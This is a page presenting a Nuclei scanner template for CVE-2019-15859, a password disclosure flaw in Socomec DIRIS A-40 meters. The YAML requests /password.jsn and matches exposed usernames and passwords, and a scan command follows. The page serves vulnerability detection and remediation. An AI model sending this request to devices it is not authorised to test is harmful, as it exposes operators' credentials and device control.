Skip to content

Socomec DIRIS A-40 Devices Password Disclosure

ID: CVE-2019-15859

Severity: critical

Author: geeknik

Tags: cve,cve2019,seclists,packetstorm,disclosure,socomec,diris,iot

Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.

id: CVE-2019-15859
info:
name: Socomec DIRIS A-40 Devices Password Disclosure
author: geeknik
severity: critical
description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.
impact: |
An attacker can obtain sensitive information such as passwords, leading to unauthorized access.
remediation: |
Update the firmware of the Socomec DIRIS A-40 devices to the latest version to mitigate the vulnerability.
reference:
- https://seclists.org/fulldisclosure/2019/Oct/10
- https://nvd.nist.gov/vuln/detail/CVE-2019-15859
- http://packetstormsecurity.com/files/154764/Socomec-DIRIS-A-40-Password-Disclosure.html
- https://www.socomec.com/single-circuit-multifunction-meters_en.html
- http://seclists.org/fulldisclosure/2019/Oct/10
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-15859
cwe-id: CWE-200
epss-score: 0.12379
epss-percentile: 0.95414
cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: socomec
product: diris_a-40_firmware
tags: cve,cve2019,seclists,packetstorm,disclosure,socomec,diris,iot
http:
- method: GET
path:
- "{{BaseURL}}/password.jsn"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/json"
- type: word
part: body
words:
- "username"
- "password"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f6ff431c2797ee2b83f6b17ba197458013b683ddb4850b85ea09f48c5369406d022100cd7b9b4f2747e8f0e37f60de4804f13eb50d31d3d6fb3f35bf5b5e12a3e82865:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-15859.yaml"

View on Github